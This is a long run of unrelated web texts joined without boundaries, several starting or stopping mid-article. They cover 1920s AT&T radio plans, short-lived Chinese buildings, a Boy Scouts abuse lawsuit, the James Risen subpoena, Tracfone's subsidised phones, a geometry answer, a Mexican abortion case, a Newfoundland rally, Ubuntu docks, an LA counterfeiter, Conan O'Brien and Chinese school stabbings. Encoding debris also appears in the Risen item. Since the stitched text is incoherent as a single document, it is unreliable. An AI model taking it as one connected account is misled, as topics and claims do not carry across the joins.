Image from the Shorpy Historic Photo Archive .
The quickest way
All this maneuvering took place when nothing was in cement , broadcasting - wise .
As radio historian Susan Smulyan has noted , when KDKA went live in 1920 , nobody knew how to make money from this new technology .
In fact , one magazine held a contest for the best essay on how to " monetize " radio , as we would say in contemporary jargon .
It might amuse Ars readers to learn that pretty much everybody agreed that commercials represented the worst possible option .
" The quickest way to kill broadcasting would be to use it for direct advertising , " warned then Secretary of Commerce Herbert Hoover .
" If a speech by the President is to be used as the meat in a sandwich of two patent medicine advertisements there will be no radio left . "
RCA Vice President David Sarnoff agreed .
Soon he would propose a " super power " system in which a few high powered transmitters would broadcast radio fare to the whole country , the content subsidized by the sales on radio receivers .
But AT&T had another idea — a network of almost 40 radio stations strung together via the telco 's long distance lines .
They would broadcast to local areas wirelessly and share content via AT &T 's long routes .
The company intended WEAF as the beginning of that experiment .
In 1923 it broadcast the annual meeting of the National Electrical Light Association via its copper wires across AT&T stations in New York , Chicago , Pittsburgh , and Schenectady .
The telco also hoped to transmit a speech by President Warren Harding from San Francisco , but bad luck nixed the plan .
" The cancellation of the speech because of Harding 's illness and subsequent death deprived AT&T of a broadcast audience estimated at between three and five million people , " Smulyan writes .
Undaunted , the carrier networked a speech to Congress by Harding 's successor , Calvin Coolidge .
Meanwhile its executives held internal meetings hatching grand plans .
On February 16 , 1923 , the corporation launched a lengthy all Bell System conference to come up with a viable vision for consolidating its hold over radio .
Broadcasting historian Steve Wurtzler summarizes what they envisioned as follows :
AT&T proposed developing U.S. radio as a dispersed , largely decentralized array of noncompetitive local broadcast stations operating at transmission power levels designed to reach members within a specific community .
AT&T would construct , own , and operate a single broadcasting station in virtually any town of consequence in the United States .
Within this model , programming would be predominantly local in origination , with the community itself determining the content , standards , and nature of broadcast material .
Programming policies and decisions were to be vested entirely in the hands of a local broadcasting association consisting of community leaders and the general public .
When the local broadcast association wished it , AT&T would provide through a modified version of their long - distance telephone system interconnections between local stations for programming of abiding national or regional interest .
As for competing stations , they would be " minimized or foreclosed through the efforts of the local broadcast associations to function inclusively , " Wurtzler explains , " encouraging all ... to join in the shared collective effort . "
If this sounds all nice and Woodstocky in print , AT&T 's implementation of the concept was far less pretty in practice , and that led to the scheme 's demise .
First the telco began denying non-Bell System radio stations access to its long distance lines for shared projects , forcing other networks to experiment with inferior telegraph rather than telephone connections for their experiments .
Then AT&T drew more anger by suing a nearby competitor to WEAF , claiming that its broadcast operation infringed on the carrier 's patents .
" To the public , already disturbed at the growth and power of trusts and cartels , AT&T seemed to be jumping with hobnailed boots over the little fellow , " write historians Christopher Sterling and John Kitross .
Soon Ma Bell executives were starting to reconsider this grand plan .
It was generating bad press , they worried , and getting in the way of the Holy Grail — convincing state utilities commissions to allow the corporation to gradually absorb all the nation 's profitable independent phone companies , a fait accompli by the late 1930s .
By 1926 , " not only had AT&T wearied of the battle , " Sterling and Kitross conclude , " but such a competitive business did not fit its longstanding corporate philosophy .
This philosophy favored monopoly , such as it had in long - distance telephony , over head - to - head competition . "
Radio set assembling room , 1925 .
Image from the Shorpy Historic Photo Archive .
The toll road not taken
And so AT&T swallowed its pride and settled with RCA , agreeing to drop its grand broadcasting plans in exchange for a profitable monopoly on providing wireline connections between radio stations .
RCA 's Sarnoff , however , quickly discovered that the public was just as suspicious of his " super power " scheme as it had been of AT&T 's broadcast radio dreams .
And so another compromise was reached .
In 1926 RCA , G.E. , and Westinghouse launched the National Broadcasting Company .
NBC offered syndicated programming to independent stations via AT&T hookups , complete with the advertising that Hoover had claimed would kill the medium .
Not until four decades later would the nation create a system of public broadcasting to compete with NBC and its parallel networks : CBS and ABC .
What are we to make of this short - lived technological gambit ?
It would be easy to celebrate AT&T 's demise in this area , and counterfactual history is always a tricky game .
But it seems to us that an opportunity was lost here .
The Bell System 's withdrawal from broadcasting left both radio and television in the hands of one technological institution , the licensed broadcast station .
The owners of these entities quickly morphed into a powerful political lobby , constantly standing in the way of competing platforms , such as cable television , satellite radio , Low Power FM , and white space broadband .
And had AT&T stuck to its guns and tried to stay in the broadcast content game ( albeit with more diplomacy and kindness ) , the company might have brought some of the innovations to broadcasting that we 're only starting to enjoy today with the iPhone , BlackBerry , and Droid .
The carrier might have also seen the potential for the Internet far sooner than it eventually did .
In the end , this story is analog water long gone under the digital bridge .
We 'll never know what might have happened otherwise .
But one thing is clear — our over - the - air broadcasters never came to their dominance in American media via some inevitable or inherently logical process .
Happenstance and good luck brought them this windfall .
Whether their luck was also our 's remains an open and ongoing question .
Further reading
At a construction and energy conservation conference that opened March 29 in Beijing , a Ministry of Housing and Construction official revealed that construction in China only has a 25 – 30 year lifespan , reports China Daily .
Chou Baoxing , vice - director of the Ministry of Housing and Construction , said at the Sixth International Green Building and Energy Conservation Conference that although China produces 2 billion square meters in new construction annually , these new buildings have a maximum lifespan of only 30 years .
The lack of longevity in Chinese construction has led to the accumulation of billions of tons of construction refuse , China Youth reports .
An article at the People ’s Daily reports that 30 – 40 percent of city garbage is construction refuse .
The article states that an astronomical amount of this kind of refuse is created annually and now surrounds many Chinese cities .
High turnover rates for building may help to explain China ’s ferocious appetite for construction materials .
China currently consumes 40 percent of the world ’s cement and steel .
But as for the short - lived nature of Chinese construction , there are multiple explanations .
Sources report that suppliers often shortchange developers , who in turn shortchange consumers .
The 1993 Consumer Rights Protection Law was drafted before housing was considered a tradable product by the government .
Therefore consumer rights protected in the 16 - year - old law do not extend to the housing sector .
Economist and blogger Zheng Fengtian acknowledges sub - standard construction practices in a post :
而据专家分析，目前我国建筑质量出现最多的问题是施工质量问题，目前不少建筑物存在钢筋不达标，混凝土保护层不达标等严重问题，偷工减料很普遍。
According to professional analysis , most problems concerning my country ’s architectural quality are construction problems .
Currently existing problems with construction material include sub - standard rebar and sub- standard concrete protective layering , among other serious problems .
Shoddy construction and the use of inferior materials are commonplace .
In July 2009 , after a 13 - storey building toppled over in Shanghai ’s Minhang District killing one construction worker , the Ministry of Housing conducted inspections in 90 cities at 180 different construction sites .
According to China Youth , 96 percent passed the inspection .
Some sources say the problem is n’t faulty construction .
Yang
Tao writes in a blog that those in power are more concerned with short term political achievement than with harm to the environment or conservation of resources , often leading to the demolition of healthy buildings .
对于权力而言，建筑垃圾不是问题，资源浪费不是问题，民众房屋寿命更不是问题，权力追求的高楼之高、广场之大，城市的整齐、划一和一尘不染的美观，以及这背后的政绩。
As far as the powers are concerned , construction refuse is not a problem , the wasting of resources is not a problem , and even more so , the lifespan of the people ’s housing is not a problem .
The powers are after the height of the skyscraper , the vastness of the square , the tidiness of the city , uniform and untouched aestheticism — and the political achievements behind the curtain .
Yang
Tao writes that even a perfect city will not satisfy the ambitions of a short - term official .
短暂的任期和异地为官的制度，让官员习惯性地短视，他们需要的是在自己的五年甚至更短的一届任期做出看得见的政绩，所以，别人建的楼和广场，永远都是别人的政绩 … 没有最大只有更大
Short terms and the system placing officials outside of their home districts make them habitually short - sighted .
Within their five year — or perhaps even shorter — term they must produce visible political achievements .
So a building or a square built by someone else will always be someone else ’s achievement …
There is no biggest , only bigger .
A post at lousun.com states that the rate of demolition in China is equivalent to 40 percent of current construction rates — as China builds 10 buildings , they tear four down .
This blogger writes that many buildings subject to demolition are healthy .
近年来，中国很多属于正常使用年限的建筑被强行拆除，大大缩短了住宅的使用寿命，这也不符合节能与建设节约型社会的要求，是造成资源浪费的又一大原因。
Recently , many buildings with normal age depreciations have been forcibly torn down , greatly reducing the lifespan of residential usage .
This does not coincide with society ’s request for energy conservation and economic construction .
It ’s another great cause of the waste of resources .
With skyrocketing housing prices and fear of a growing real estate bubble , high demolition rates and dangerously shoddy construction remains an enigma .
Blogger kkdstt says the situation is truly characteristic to China .
花最贵的价钱买最短命的建筑，这样的事情只有在和谐中国能够发生。
Spending the greatest amount of money to buy the housing with the shortest lifespan — this kind of thing could only happen in harmonious China .
These conditions put the livelihood of the people at risk , kkdstt writes .
在房价一飞冲天的年代，没有人关注建筑质量，没有人关注和百姓联系的民生。大家想的是如何把老百姓从他们栖息了千年的土地上赶走，然后找一帮所谓的专家搞一些百姓听不懂、看不明白的概念方案 … 只要楼盖起来了，房价涨起来了，GDP增长了，财政收入增加了，即使房子是纸糊的，与我何干。
In an age when housing prices have gone through the roof , no one is concerned about construction quality ; no one is concerned about the common people ’s livelihood .
Everyone is thinking about how to drive the commoners from their ancestral homes — finding a band of so called professionals to craft concepts that the people do n’t understand …
As long as the buildings go up , housing prices rise , the GDP and the government ’s income increases , housing could be made of paper for all I care .
A code was passed during a 2006 government workshop stipulating that all major buildings be built with a lifespan of 100 years and all normal buildings be built to last 50 – 100 years .
Despite this code and other inspection procedures , a lack of longevity throughout the industry persists .
Perhaps the 2008 Sichuan Earthquake that reportedly killed at least 68,000 people is an example of the dangers of sub-standard construction .
The earthquake leveled more than 7,000 schools , many of which were compared to Tofu due to their altogether flimsiness .
With the Vatican in the grips of a pedophilia scandal , the spotlight in America is being turned on US scouting , which is accused of keeping quiet about decades of alleged sexual aggression by its leaders against young boys .
The Boy Scouts of America are being sued by a man who said he was abused five times when he was between 11 and 12 years old by his then - scoutmaster in Portland , Oregon .
ADVERTISEMENT
The identity of the alleged victim , now 37 , is being concealed for fear of reprisals related to the 29 - million - dollar sex abuse lawsuit he brought against the Boy Scouts of America and its local Portland branch , the Cascade Pacific Council .
The plaintiff decried what he described as the group ’s silence on sexual abuses targeting children and teenagers at the hands of trusted scout leaders .
The alleged abuser , Timur Dykes , now 53 , admitted after the incidents that he was a serial molester .
He has been convicted three times for sex abuse against boys .
Scouts have convicted before US courts time and again , but this trial has gained more notoriety as fresh accusations of sex abuse hit the Catholic Church , said Patrick Boyle , editor of the website youthtoday.com .
“ Institutional child sex abuse is really on everyone ’s mind right now , ” said Boyle , author of the book “ Scout ’s Honor : Sexual Abuse in America ’s Most Trusted Institution . ”
ADVERTISEMENT
He said the court case “ offers people another example of how institutions and organizations have so much sex abuse and have been hiding sex abuse for so long . ”
The trial is unique in that it has forced the Boy Scouts , which celebrates its centennial this year , to submit to the court for the first time in 20 years documents detailing sexual abuse recorded by the organization .
Although the group has been sued dozens of times over sex abuse , most cases settled out of court , which ensured the records were kept confidential .
ADVERTISEMENT
“ The files were created almost a century ago .
So it shows what the scout officials knew , how many kids were abused … where the abuse occurs , ” Boyle told AFP .
He said the Boy Scouts were aware of “ thousands ” of children abused over several decades .
ADVERTISEMENT
Treading cautiously , the Texas - based scouts issued a terse statement saying : “ Unfortunately , child abuse is a societal problem and there is no fail - safe method for screening out abusers . ”
But by Friday , the statement was no longer on the organization ’s website , www.scouting.org.
According to Boyle , scouts say they do not chose local leaders , a responsibility that falls instead to local officials , like the Cascade Pacific Council and the Mormon Church in the Oregon case .
ADVERTISEMENT
But the scouts “ do tell the troop ’s sponsors what kind of person you ’re allowed to take , what you have to do to check somebody out , and also to act when they do something like abusing kids , ” Boyle said .
The Oregon victim ’s lawyer , Kelly Clark , declined to comment on the trial , which got underway last month .
On his website , www.boyscoutabuse.com, Clark writes that victims may feel “ an added sense of guilt about bringing legal action against an organization that many view in a positive light , one that no doubt has helped many boys , and , indeed , an organization that stresses ‘ loyalty ’ as one of its core values . ”
Boyle lamented that the Boy Scouts would not admit to their sex abuse problems .
ADVERTISEMENT
“ I wish the Boy Scouts would take all the files , give them to a researcher so that we know how often it ’s happened , how it happened so they can try to shape their program better to stop it , ” he said .
As senator , Barack Obama called the Bush Administration ’s warrantless wiretapping program illegal , and demanded greater transparency from government .
But as president , he ’s strongly defended large components of the program , which involved major telecommunications companies providing the government access to their networks without a warrant to allegedly thwart terrorist plots .
ADVERTISEMENT
And now , his administration is subpoenaing the very reporter who broke the warrantless wiretapping story in 2005 for the New York Times .
Obama Attorney General Eric Holder approved a subpoena seeking to compel Times reporter James Risen to testify about his sources , which was delivered to Risen on Monday and reported in Thursday ’s Times .
The paper called the move a “ rare step ” and said that Holder personally approved the subpoena .
Risen was previously subpoenaed by the Bush Justice Department for the same matter , which involves a book he published on the CIA .
That subpoena expired last year .
The subpoena does not concern his reporting on the wiretapping program itself .
Instead , it seeks to force Risen to turn over his sources regarding a chapter in his book which deals with a CIA effort to foil Iran ’s alleged development of a nuclear weapon .
A Justice Department would n’t discuss the subpoena with the Times , but said , Ã¢â‚ ¬ Å“ As a general matter , we have consistently said that leaks of classified information are a matter we take extremely seriously .
Ã¢â‚¬Â
ADVERTISEMENT
The Obama Administration has generally sought to aggressively protect classified information .
In 2008 , the Obama Administration expanded their defense of former President Bush ’s wiretapping program , arguing that government agencies could n’t be sued for their involvement in it because they were protected by a “ sovereign immunity ” clause in the Patriot Act .
In fact , a close read of the government filing revealed that the Obama Administration has gone beyond any previous legal claims put forth by former President Bush .
ADVERTISEMENT
The Obama Administration ’s brief contends that government agencies cannot be sued for wiretapping American citizens even if there was intentional violation of US law .
They maintain that the government can only be sued if the wiretaps involve “ willful disclosure ” — a higher legal bar .
Writing about the filing in 2008 , constitutional scholar and liberal Salon columnist Glenn Greenwald wrote , “ In other words , beyond even the outrageously broad ‘ state secrets ’ privilege invented by the Bush administration and now embraced fully by the Obama administration , the Obama DOJ has now invented a brand new claim of government immunity , one which literally asserts that the U.S. Government is free to intercept all of your communications ( calls , emails and the like ) and — even if what they ’re doing is blatantly illegal and they know it ’s illegal — you are barred from suing them unless they ‘ willfully disclose ’ to the public what they have learned . ”
ADVERTISEMENT
Risen ’s attorney told the Times that the subpoena sought information regarding a specific narrative in his book about a CIA effort to thwart Iran ’s nuclear aspirations .
“ The book describes how the agency sent a Russian nuclear scientist Ã¢â‚¬â€  who had defected to the United States and was secretly working for the C.I.A .
Ã¢â‚¬â€ to Vienna in February 2000 to give plans for a nuclear bomb triggering device to an Iranian official under the pretext that he would provide further assistance in exchange for money , ” the paper said .
“ The C.I.A. had hidden a technical flaw in the designs . ”
“ The scientist immediately spotted the flaw , Mr. Risen reported , ” it added .
“ Nevertheless , the agency proceeded with the operation , so the scientist decided on his own to alert the Iranians that there was a problem in the designs , thinking they would not take him seriously otherwise . ”
ADVERTISEMENT
Risen received a Pulitzer prize for his 2005 story , “ Bush Lets US Spy on Callers Without Courts . ”
Tracfone began providing its service , called SafeLink , in Tennessee in August and now does so in 16 states , including New York , North Carolina and Pennsylvania , and the District of Columbia , according to its Web site .
Each time it enters a market  which generally requires state approval  it runs television ads telling people how easy it is to get a free Motorola phone , like Mr. Cobb’s .
The company says the economy makes the audience particularly receptive .
“ We ’ll read that more people are signing up for food stamps and look at our numbers and see volume rising , ” said Jose Fuentes , director of government relations for Tracfone .
“ It ’s not scientific proof , ” he added .
“ But we know times are tough . ”
He declined to say how many subscribers have signed up .
But he said Tracfone , whose paid service has 10 million subscribers , sees the Lifeline service as an opportunity to make some money but , more pointedly , to eventually convert the subsidized customers into paying ones if their fortunes turn around and they no longer qualify for a free phone .
“ It could make for a good business , ” Mr. Fuentes said .
According to Nielsen , 90 percent of Americans have at least one cellphone .
That leaves 32 million , including the infirm , still up for grabs .
“ And the race is on to get them , ” Mr. Entner said .
He said the overwhelming majority of Americans with subsidized wireless service receive it through Tracfone .
One of them is Leon Simmons , 52 , of the Bronx , N.Y. , who did stints in the Navy , at the Post Office and as a security guard before becoming disabled with emphysema .
His wife , who works a minimum wage job at a laundry , heard about the Tracfone service and he got a phone in April .
The free phone is not , as it is for some others in the program , their sole form of telecommunications .
Out of the roughly $ 1,600 they make each month after taxes , they pay $ 159 for a landline telephone , high - speed Internet and cable television .
But the cellphone , Mr. Simmons says , gives him the flexibility to tell his wife or daughter his comings and goings or to stay in touch when he is at the doctor .
There was an issue with your link ,
or the content is no longer available .
Please copy and paste the entire URL and try again .
If this message persists then the content has expired
and you need to contact the sender .
short
'' When I get out of the car he pursues me into the house and even comes inside and trails me around the house .
I can't cut the grass without him following me around .
I think there are 3 pieces to this .
calculate the intersection of the 2 lines , and hold on to the X and Y coordinates of that point find the section that the given point is in .
This should be easy enough , because you have the slope of the 2 lines , and the slope of the line created by the given point and the point of intersection .
Call them m_line1 , m_line2 and m_intersect .
If m_intersect There 's a formula to figure out the section using these values and the location of the given point .
find the closest integer .
There is also a straightforward calculation of this once you know the values from # 1 above , and the slopes from # 2 .
You can brute - force it , but there is an elegant mathematical solution .
These are the steps I took , at least .
Updated to add more substance
OK , I 'll start us off with a discussion on # 2 .
If you calculate the slope of the given point and the intersection point , then you arrive at m_intersection .
This is the slope of a line that passes through the intersection point .
Let 's assume that m_line1 is the greater of the 2 slopes , so that line1 is " above " line2 as x increases after the intersection .
It makes it easier to think about for section names .
We 'll call section A the section given by the sliver between line1 and line2 for x larger than the intersection coordinate x , and then we 'll name the other 3 sections clockwise , so that A and C are opposite each other .
If m_intersection is between m_line1 and m_lin2 , then it must be in one of the 2 sections A or C .
Which section is a simple test of the x coordinate value against the intersection 's x coordinate .
We defined A to be the section with greater value .
A similar calculation can be made if the slope is outside m_line1 or m_line2 .
This gives you the section that your point lies in .
All you did was calculate 1 intersection ( 5 multiplications , 2 divisions and a handful of subtractions if you do it the traditional way ) , 3 slopes , and then a couple integer comparisons .
Edit # 3 - back by ( un ) popular demand !
So here is how I calculated # 3 , the closest integer point to the intersection .
It may not be the best , but it uses binary search , so it 's O ( log n ) where n is related to the inverse of the difference of the line slopes .
The closer they are together , the larger n is .
First , take the difference between the slopes of the two lines .
Say it 's 1/8 .
This means that from the point of intersection , you have to go out 8 units along the x axis before you are guaranteed that there is a whole integer on the y axis in between the two lines ( it may be on one of the lines ) .
Now , if the intersection itself is not on an integer x coordinate , then you 'll need to step out further to guarantee that your starting point is on an integer x coordinate , but it is bounded .
If the intersection is at x = 1.2 , then in the above example , at worst you 'd start at x = 41 , then move down ~5 units along the y axis .
Choose either the ceil or floor of the y value that you get .
It 's not terribly critical .
Now that you have a starting point , the closest point can be approximated by binary search .
Your new line segment is between the intersection and the starting point , and your units of movement are multiples of that line segment 's slope .
Calculate the midpoint of the line segment and see if it lies in between the two lines .
Add or subtract 1 to it if it is not a direct hit , and if either of those hits , cut the remaining distance in half and do it again .
Otherwise search the further half of the segment .
If you do n't have a slope difference < 1 , I think the problem may be simpler ( brute force the space around the intersection ) .
But it 's just a special case of the search above , where you do n't need to step out that far to find a starting point .
Mexico City , Mexico ( CNN ) --
A pregnant 10 - year - old , allegedly raped by her stepfather , has become the latest lightning rod in the country 's heated abortion debate .
The girl 's stepfather has been arrested .
But advocates on both sides of the issue say their battle is just beginning .
" This girl is much more than an isolated case , " said Adriana Ortiz - Ortega , a researcher at Mexico 's National Autonomous University who has written two books on abortion in Mexico , " and there is much more influence now from conservative groups that are trying to prevent the legalization of abortion . "
Read more at CNN Mexico
Abortion is legal in Mexico 's capital city , but prohibited or significantly restricted in most of the country 's states .
The girl 's home state of Quintana Roo , on the Yucatan peninsula , allows abortion in cases of rape during the first 90 days of the pregnancy .
But the 10 - year - old girl is at 17 ½ weeks , nearly a month past that limit .
Advocacy groups are calling for federal officials and the United Nations to investigate Quintana Roo 's handling of the matter , claiming officials did not inform her of her abortion rights .
" We do n't know what is happening , and the institution that is supposed to provide support and care for these minors has n't been transparent .
We 're really asking for accountability , " said Maria Luisa Sanchez Fuentes , director of the Information Group on Reproductive Choice .
State Attorney General Francisco Alor Quezada said he did not know whether officials had told the girl she had the option of pursuing an abortion , and he did not know how far the girl was into her pregnancy when her mother reported the assault to authorities last month .
He said the girl is in the custody of state protective services , and officials are closely monitoring her physical and psychological care .
" I do not think there is another instance in which the girl could be in better hands , " he said Monday .
Child protective services officials in Quintana Roo said in a statement last week that the girl and the fetus were in good health .
But Quintana
Roo state legislator Maria Hadad said the girl 's doctors are n't telling the whole story .
She said continuing the pregnancy could cause severe mental and physical health problems for the girl .
" It 's not just a high - risk pregnancy .
It 's a pregnancy that puts the girl at risk , " Hadad told Mexican broadcaster Channel 10 in Chetumal , Mexico .
The Roman Catholic Church vocally opposes abortion in Mexico , and the topic has long been controversial there .
The debate has been particularly heated since 2007 , when the nation 's more liberal capital city approved a law legalizing abortion during the first three months of pregnancy with no restrictions .
That decision was challenged and ultimately upheld by the country 's Supreme Court in 2008 .
Since 2007 , 17 states have passed laws " protecting life beginning at conception , " according to the Information Group on Reproductive Choice .
Legislators in Quintana Roo , which is also is home to the popular resort city of Cancun , approved such changes to its constitution last year
CNN 's Nadia Sanders and Krupskaia Alis in Mexico City , and Catherine E. Shoichet and Rafael Romo in Atlanta contributed to this report .
Newfoundland International Motorsports
Limited regrets to inform you that due to the COVID pandemic we will be postponing the first combined Targa Bambina and Targa Newfoundland events which were scheduled to be held during September 2020 .
Newfoundland International Motorsports Limited Read more
Newfoundland International Motorsports Limited announces a New President .
St. John ’s ( August 12 , 2020 )
After nearly 20 years of staging one of Canada ’s most iconic and challenging motorsport events , there is a change in management at Targa Newfoundland .
Effective August 10 , Read more
Newfoundland International Motorsports Limited announces Covid Cancellation of its Bambina .
St. John ’s ( August 31 , 2020 )
After nearly 20 consecutive years of staging one of Canada ’s most iconic and challenging motorsport events , Targa Newfoundland has decided to cancel its Super Targa Read more
Welcome to Targa
Owned and operated by Newfoundland International Motorsports Limited , Targa Newfoundland is one of three internationally recognized Targa motorsports events in the world .
The 2020 event starts with our two - day optional Driving School on September 12th & 13th .
The Tech / Registration Day is September 14th .
Prologue Stages occur on September 15th .
The actual competition will start in St. John ’s on September 16th and concludes back in the capital on September 20th .
The annual rally will cover more than 1,500 kilometres of the challenging , twisty roads of the central and eastern portion of the island of Newfoundland , including over 440 kilometres of closed - road , flat - out Targa stages .
The best and worst docks for Ubuntu
Docks became popular when Mac began using them in their operating system .
But these days docks are available on all platforms .
So which ones should you avoid and which ones should you use ?
Lets start with the ones you should avoid .
1. Simdock
It ’s in the official Ubuntu 8.04 repository , but do n’t ask me why .
The screen shot says it all .
Advise : avoid at all costs !
2. Gdesklets dock
I did n’t even install this one in hardy .
I ’m speaking from experience about this dock .
Gdesklets was extremly unstable for me in gutsy and made my pc crash on numerous occasions .
When it was not busy crashing , it was having a serious impact on resources .
If you want a screen shot , try google .
Advise : try it if you want , but be warned , you ’ll hate it .
3. Kiba Dock
The dock itself is n’t to bad .
It ’s not the best , but still pretty good .
The reason I think people should avoid this application is because you need to compile it from source .
Advise : if you feel like compling it from source , by all means do so
Now , which ones should you try ?
1. AWN
Short for Avant Window Navigator , AWN is one of the best docks availabe this day .
It offers great applets , you can download themes from the internet , it has a flat and 3d look ( look here for the curved look ) .
You can set all kind of effects for the icons .
I did n’t crash on me when I used it and I did n’t experience any kind of impact on my system because of awn .
It ’s in the Ubuntu repository , so install it as you would any other application .
Advise : if you are looking for a dock , you should test this one .
2. Cairo Dock
My favorite one .
The reason ?
It just looks the best .
The program comes with a dozen or so standard “ skins ” you can choose the first time you start it .
It has all the options you would expect from a dock , and some more .
It is not in the repositories ( I do n’t get how simdock gets in , and this does n’t ) , but installation is easy .
Go to this page , and download the latest “ dock ” and “ plugin ” . deb files .
Double click them to install .
After installation , you can open Cairo Dock using “ applications -> system tools ” .
Advise : the best one available for ubuntu , so make sure to give it a try .
If you want any of the docks to start on start up , add them in “ system -> preferences -> session ” .
In the “ command ” box , you should enter the name of the application , search for the application in synaptic ( system -> administration ) after you installed it , and use that exact name .
Note : KXDocker is / will be discontinued so it is n’t in the list .
If you know any other docks , feel free to mention them in the comments .
I will be happy to add them into the post .
Adviced by users :
1. Wbar
It ’s more of an application launcher , because I does n’t let you “ dock ” programs , but it has a usefull number of apps it can launch .
The best part of this little “ dock ” is that it does n’t need a composite manager ( like compiz fusion , or the one build into Ubuntu 8.04 ) to run .
So it ’s perfect to add some eye - candy if you are running low - end hardware .
Download the .deb file here .
Advice :
If you are running low - end hardware , this might be for you .
Trendy Teddy mentioned there are GUI ’s ( graphical interfaces ) available to change some settings .
wbarconf
http://www.gnomefiles.com/app.php/wbarconf
wbar util
http://www.gnomefiles.com/app.php/wbar_util
Update
There is a new dock on the scene called “ Docky ” .
It ’s actually more than just another dock , it ’s a front end for gnome - do .
The dock can be used to search for all sort of things , in the screenshot I just entered “ U ” and it suggested to play all U2 songs .
When I pressed enter , Rhytmbox popped up and played all my U2 songs .
This is the best dock for any operating system by far .
Docky Website
It started 11 days ago when a resident at an upscale downtown L.A. high - rise tower smelled fumes coming from a neighboring apartment .
Firefighters knocked on the neighbor ’s door but he refused to let them in .
They called police , who broke down the door of the penthouse just as the man inside was escaping through a back window and down a fire escape carrying duffel bags .
“ He escaped like Jason Bourne , ” said LAPD Deputy Chief Mike Downing of the Counter - Terrorism Bureau , referring to the movie spy character .
What they found next began a weeklong mystery .
Advertisement
The apartment contained sophisticated counterfeiting equipment as well as a cache of weapons including an AK - 47 .
They also found stacks of counterfeit $ 100 bills totaling $ 15,000 and a camera tripod .
But detectives ’ interest was really heightened when they looked outside the window and saw that the penthouse balcony had a spot - on view of the U.S. Federal Reserve building on Grand Avenue .
Detectives now are searching for the suspect , who leased the $ 3,400 - a- month penthouse , paying one year in advance using stacks of cash .
Detectives are not sure what Brian Alexik , a 33 - year - old New Jersey man , was up to and what role , if any , the Federal Reserve might have played in his schemes .
They are not exactly sure whom they are dealing with because detectives found multiple identifications , including passports , listing different aliases for the man .
Advertisement
“ The curiosity in this case is the strategic location in which he chose to operate , ” Downing said .
Photos found at the apartment show Alexik with significantly different looks .
In one photo , he ’s clean - shaven , holding up a glass of wine and smiling .
Another shows him somewhat heavier , with a beard and bandanna covering his forehead .
Police are now working with the U.S. Secret Service .
Experts who have reviewed the counterfeit money say it ’s of extremely high quality .
It appears Alexik kept to himself .
The apartment manager declined to comment on the case .
Advertisement
The LAPD served search warrants at several downtown locations and Thursday announced the arrest of a man whom officials describe as an “ associate ” of Alexik .
Gregory Koller , 32 , was booked on suspicion of narcotics possession .
Police said a search of his home and a downtown warehouse found evidence of “ items consistent with manufacturing weapons . ”
LAPD Capt .
Steven Sambar , head of the department ’s major crimes division , said there evidence was also found linking Koller to Alexik .
Detectives said they were puzzled about many aspects of the case .
Sambar said it appeared that the pair were involved in weapons and drugs as well as counterfeiting — but it was unclear how large the operation was or whether it was connected to a larger criminal enterprise .
Sambar said the location of Alexik ’s apartment overlooking the Federal Reserve “ causes me great concern . ”
Advertisement
The Federal Reserve bank in downtown L.A. is one of several branches of the 12th District of the Fed , which is based in San Francisco .
According to the Fed ’s website , the L.A. branch has 316 employees and serves financial institutions in Southern California , Arizona and southern Nevada .
The 12th District as a whole processed 17.2 billion currency notes in 2008 , or about 68.4 million notes per business day .
No breakdown was available for currency handled specifically by the L.A. office .
It all leaves many intriguing possibilities .
“ There were many levels of criminality , ” Downing said .
“ He ’s funding a criminal enterprise .
He ’s dabbling in narcotics , he ’s manufacturing weapons parts .
But what is it ?
Was there a bigger plan ?
What was his intent ?
We have a lot of questions for him when he is arrested . ”
Advertisement
andrew.blankstein@latimes.com
richard.winton@latimes.com
Conan O'Brien on ' 60 Minutes : ' I Would Not Have Done the Same to Leno Former " Tonight Show " host discusses Jay Leno on " 60 Minutes . "
April 29 , 2010  --
Now that Conan O'Brien has taken his comedy show on the road , he seems to have gotten a taste for talking .
In an interview to air on " 60 Minutes " this Sunday , the former " Tonight Show " host said he would not have handled this year 's talk show imbroglio the way his former network - mate Jay Leno did .
" He went and took that show back , " O'Brien said in an excerpt of the interview released by CBS on Thursday .
" And I think in a similar situation , if roles had been reversed , I know -- I know me , I would n't have done that .
" If I had surrendered ' The Tonight Show ' and handed it over to somebody publicly and wished them well -- and then ... six months later , I would n't have taken it back , " he said .
" But that 's me , you know .
Everyone 's got their own , you know , way of doing things . "
O'Brien left NBC in January after 17 years with the network in a refusal to play second - fiddle to Leno , his immediate " Tonight Show " predecessor , when the network expressed displeasure at O'Brien 's ratings .
O'Brien said he soured on the network for not giving him enough time to cultivate an audience after his move from 12:30 a.m. , where he'd worked for about a decade and a half , to 11:30 p.m .
" I think this relationship is going be toxic and maybe we just need to go our separate ways , " O'Brien said .
" That 's really how it felt to me ... and I started to feel that I 'm not sure these people even really want me here ... I can't do it [ anymore ] . "
For his part , Leno gave his first exclusive interview to Oprah Winfrey in January .
He admitted to feeling bad that the network wanted to put him back into the 11:30 p.m. time slot so quickly after he vacated it .
" I did , I felt really bad for Conan , " Leno told Winfrey .
" I think it was unfair .
But it was unfair for me . "
Leno contended O'Brien 's exit from " The Tonight Show " was n't his fault , saying O'Brien 's low ratings damaged the franchise and spelled his end .
" It had nothing to do with me , " he told Winfrey .
" As I say , there is always someone waiting in the wings in this business to take your job .
If you 're not doing the numbers , you move on .
It 's that simple . "
Conan's Next Act
And " move on " is what O'Brien has done .
In a surprise announcement earlier this month , the redheaded funnyman announced he'd chosen TBS as his future talk - show home .
The as - yet - untitled show expected to debut in November , will air Mondays through Thursdays at 11 p.m. ET , which will shift " Lopez Tonight , " starring George Lopez , from 11 p.m. ET to midnight .
O'Brien currently is headlining a two - month - long live , comedy - music tour .
Titled " Legally Prohibited From Being Funny on Television , " O'Brien 's tour kicked off in Eugene , Oregon April 12 before forging on to venues in at least 20 states and two Canadian provinces .
Image A student who was wounded Wednesday in an attack in Guangdong Province , where 15 students were stabbed .
Credit ... Associated Press
“ The three killers wanted to get revenge on society , ” one person , Zhang Han , wrote in an Internet chat posting .
“ They considered themselves as ‘ underprivileged , ’ and they chose an even more vulnerable group , children , to get revenge .
Doubtless their own psychological problems played an indispensable role .
But social inequality is obviously the catalyst . ”
There likely is no single explanation for the assaults in Fujian , Shandong , Jiangsu and , on Wednesday , in Guangdong Province , where a 33 - year - old former teacher stabbed 15 fourth - and fifth - graders .
( In China , where access to guns is tightly controlled , knives are one weapon of choice in violent crimes . )
Many Chinese might correctly note that their situation is hardly unique ; the United States and other nations have also endured violent attacks on students .
Yet some aspects of the assaults — the alacrity with which they were copied by new assailants , to cite one example — raised questions among some Chinese about whether something else was at work here .
